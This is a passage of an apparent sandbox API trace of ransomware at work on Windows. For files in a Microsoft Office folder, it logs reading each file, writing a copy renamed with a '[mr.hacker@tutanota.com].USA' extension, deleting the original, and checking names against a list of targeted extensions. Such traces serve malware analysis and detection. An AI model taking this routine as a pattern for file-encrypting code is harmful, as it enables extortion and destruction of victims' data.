lpString2=".VRD") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.149] lstrlenW (lpString=".jpg") returned 4 [0273.149] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0273.149] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0273.149] lstrlenW (lpString="GANTT.VSL") returned 9 [0273.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.377] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=320880) returned 1 [0273.377] CloseHandle (hObject=0x348) returned 1 [0273.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl")) returned 0x20 [0273.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.377] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.377] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.378] GetLastError () returned 0x0 [0273.378] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x4e570, lpOverlapped=0x0) returned 1 [0273.394] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x4e580, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x4e580, lpOverlapped=0x0) returned 1 [0273.399] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.399] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0273.399] SetEndOfFile (hFile=0x3c0) returned 1 [0273.399] CloseHandle (hObject=0x3c0) returned 1 [0273.399] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.399] SetEndOfFile (hFile=0x348) returned 1 [0273.406] CloseHandle (hObject=0x348) returned 1 [0273.406] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.407] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl")) returned 1 [0273.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.407] lstrlenW (lpString=".doc") returned 4 [0273.407] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.407] lstrlenW (lpString=".docx") returned 5 [0273.407] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1 [0273.407] lstrlenW (lpString=".pdf") returned 4 [0273.407] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.407] lstrlenW (lpString=".xls") returned 4 [0273.407] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.407] lstrlenW (lpString=".xlsx") returned 5 [0273.407] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1 [0273.407] lstrlenW (lpString=".ppt") returned 4 [0273.407] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.407] lstrlenW (lpString=".zip") returned 4 [0273.407] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.407] lstrlenW (lpString=".rar") returned 4 [0273.407] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.407] lstrlenW (lpString=".bz2") returned 4 [0273.407] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.407] lstrlenW (lpString=".7z") returned 3 [0273.407] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.407] lstrlenW (lpString=".dbf") returned 4 [0273.408] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.408] lstrlenW (lpString=".1cd") returned 4 [0273.408] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.408] lstrlenW (lpString=".jpg") returned 4 [0273.408] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.408] lstrlenW (lpString=".doc") returned 4 [0273.408] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString=".docx") returned 5 [0273.408] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1 [0273.408] lstrlenW (lpString=".pdf") returned 4 [0273.408] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString=".xls") returned 4 [0273.408] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.408] lstrlenW (lpString=".xlsx") returned 5 [0273.408] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1 [0273.408] lstrlenW (lpString=".ppt") returned 4 [0273.408] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.408] lstrlenW (lpString=".zip") returned 4 [0273.408] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.408] lstrlenW (lpString=".rar") returned 4 [0273.408] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString=".bz2") returned 4 [0273.408] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.408] lstrlenW (lpString=".7z") returned 3 [0273.408] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.409] lstrlenW (lpString=".dbf") returned 4 [0273.409] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.409] lstrlenW (lpString=".1cd") returned 4 [0273.409] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57 [0273.409] lstrlenW (lpString=".jpg") returned 4 [0273.409] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.409] lstrcmpiW (lpString1=".GRA", lpString2=".USA") returned -1 [0273.409] lstrlenW (lpString="GR8GALRY.GRA") returned 12 [0273.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.409] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=186880) returned 1 [0273.409] CloseHandle (hObject=0x348) returned 1 [0273.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra")) returned 0x20 [0273.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.410] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.410] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.410] GetLastError () returned 0x0 [0273.410] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x2da00, lpOverlapped=0x0) returned 1 [0273.416] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2da10, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2da10, lpOverlapped=0x0) returned 1 [0273.419] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.419] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.419] SetEndOfFile (hFile=0x3c0) returned 1 [0273.420] CloseHandle (hObject=0x3c0) returned 1 [0273.420] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.420] SetEndOfFile (hFile=0x348) returned 1 [0273.424] CloseHandle (hObject=0x348) returned 1 [0273.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.424] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra")) returned 1 [0273.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.424] lstrlenW (lpString=".doc") returned 4 [0273.424] lstrcmpiW (lpString1=".doc", lpString2=".GRA") returned -1 [0273.424] lstrlenW (lpString=".docx") returned 5 [0273.424] lstrcmpiW (lpString1=".docx", lpString2="Y.GRA") returned -1 [0273.424] lstrlenW (lpString=".pdf") returned 4 [0273.424] lstrcmpiW (lpString1=".pdf", lpString2=".GRA") returned 1 [0273.424] lstrlenW (lpString=".xls") returned 4 [0273.424] lstrcmpiW (lpString1=".xls", lpString2=".GRA") returned 1 [0273.424] lstrlenW (lpString=".xlsx") returned 5 [0273.425] lstrcmpiW (lpString1=".xlsx", lpString2="Y.GRA") returned -1 [0273.425] lstrlenW (lpString=".ppt") returned 4 [0273.425] lstrcmpiW (lpString1=".ppt", lpString2=".GRA") returned 1 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString=".zip") returned 4 [0273.425] lstrcmpiW (lpString1=".zip", lpString2=".GRA") returned 1 [0273.425] lstrlenW (lpString=".rar") returned 4 [0273.425] lstrcmpiW (lpString1=".rar", lpString2=".GRA") returned 1 [0273.425] lstrlenW (lpString=".bz2") returned 4 [0273.425] lstrcmpiW (lpString1=".bz2", lpString2=".GRA") returned -1 [0273.425] lstrlenW (lpString=".7z") returned 3 [0273.425] lstrcmpiW (lpString1=".7z", lpString2="GRA") returned -1 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString=".dbf") returned 4 [0273.425] lstrcmpiW (lpString1=".dbf", lpString2=".GRA") returned -1 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString=".1cd") returned 4 [0273.425] lstrcmpiW (lpString1=".1cd", lpString2=".GRA") returned -1 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString=".jpg") returned 4 [0273.425] lstrcmpiW (lpString1=".jpg", lpString2=".GRA") returned 1 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.425] lstrlenW (lpString=".doc") returned 4 [0273.425] lstrcmpiW (lpString1=".doc", lpString2=".GRA") returned -1 [0273.425] lstrlenW (lpString=".docx") returned 5 [0273.425] lstrcmpiW (lpString1=".docx", lpString2="Y.GRA") returned -1 [0273.425] lstrlenW (lpString=".pdf") returned 4 [0273.425] lstrcmpiW (lpString1=".pdf", lpString2=".GRA") returned 1 [0273.425] lstrlenW (lpString=".xls") returned 4 [0273.426] lstrcmpiW (lpString1=".xls", lpString2=".GRA") returned 1 [0273.426] lstrlenW (lpString=".xlsx") returned 5 [0273.426] lstrcmpiW (lpString1=".xlsx", lpString2="Y.GRA") returned -1 [0273.426] lstrlenW (lpString=".ppt") returned 4 [0273.426] lstrcmpiW (lpString1=".ppt", lpString2=".GRA") returned 1 [0273.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.426] lstrlenW (lpString=".zip") returned 4 [0273.426] lstrcmpiW (lpString1=".zip", lpString2=".GRA") returned 1 [0273.426] lstrlenW (lpString=".rar") returned 4 [0273.426] lstrcmpiW (lpString1=".rar", lpString2=".GRA") returned 1 [0273.426] lstrlenW (lpString=".bz2") returned 4 [0273.426] lstrcmpiW (lpString1=".bz2", lpString2=".GRA") returned -1 [0273.426] lstrlenW (lpString=".7z") returned 3 [0273.426] lstrcmpiW (lpString1=".7z", lpString2="GRA") returned -1 [0273.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.426] lstrlenW (lpString=".dbf") returned 4 [0273.426] lstrcmpiW (lpString1=".dbf", lpString2=".GRA") returned -1 [0273.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.426] lstrlenW (lpString=".1cd") returned 4 [0273.426] lstrcmpiW (lpString1=".1cd", lpString2=".GRA") returned -1 [0273.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60 [0273.426] lstrlenW (lpString=".jpg") returned 4 [0273.426] lstrcmpiW (lpString1=".jpg", lpString2=".GRA") returned 1 [0273.426] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0273.426] lstrlenW (lpString="GRAPH.HXS") returned 9 [0273.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.427] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=610086) returned 1 [0273.427] CloseHandle (hObject=0x348) returned 1 [0273.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs")) returned 0x20 [0273.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0273.427] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.427] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.755] GetLastError () returned 0x0 [0273.757] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x94f26, lpOverlapped=0x0) returned 1 [0273.804] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x94f30, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x94f30, lpOverlapped=0x0) returned 1 [0273.814] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.814] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0273.814] SetEndOfFile (hFile=0x390) returned 1 [0273.814] CloseHandle (hObject=0x390) returned 1 [0273.815] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.815] SetEndOfFile (hFile=0x348) returned 1 [0273.828] CloseHandle (hObject=0x348) returned 1 [0273.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.828] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs")) returned 1 [0273.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.828] lstrlenW (lpString=".doc") returned 4 [0273.828] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0273.828] lstrlenW (lpString=".docx") returned 5 [0273.829] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1 [0273.829] lstrlenW (lpString=".pdf") returned 4 [0273.829] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString=".xls") returned 4 [0273.829] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString=".xlsx") returned 5 [0273.829] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1 [0273.829] lstrlenW (lpString=".ppt") returned 4 [0273.829] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString=".zip") returned 4 [0273.829] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString=".rar") returned 4 [0273.829] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString=".bz2") returned 4 [0273.829] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0273.829] lstrlenW (lpString=".7z") returned 3 [0273.829] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString=".dbf") returned 4 [0273.829] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString=".1cd") returned 4 [0273.829] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString=".jpg") returned 4 [0273.829] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.829] lstrlenW (lpString=".doc") returned 4 [0273.830] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0273.830] lstrlenW (lpString=".docx") returned 5 [0273.830] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1 [0273.830] lstrlenW (lpString=".pdf") returned 4 [0273.830] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0273.830] lstrlenW (lpString=".xls") returned 4 [0273.830] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0273.830] lstrlenW (lpString=".xlsx") returned 5 [0273.830] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1 [0273.830] lstrlenW (lpString=".ppt") returned 4 [0273.830] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0273.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.830] lstrlenW (lpString=".zip") returned 4 [0273.830] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0273.830] lstrlenW (lpString=".rar") returned 4 [0273.830] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0273.830] lstrlenW (lpString=".bz2") returned 4 [0273.830] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0273.830] lstrlenW (lpString=".7z") returned 3 [0273.830] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0273.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.830] lstrlenW (lpString=".dbf") returned 4 [0273.830] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0273.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.830] lstrlenW (lpString=".1cd") returned 4 [0273.830] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0273.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57 [0273.830] lstrlenW (lpString=".jpg") returned 4 [0273.830] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0273.831] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".USA") returned -1 [0273.831] lstrlenW (lpString="GRINTL32.DLL.IDX_DLL") returned 20 [0273.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.983] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=37760) returned 1 [0273.983] CloseHandle (hObject=0x2ac) returned 1 [0273.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll")) returned 0x20 [0273.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 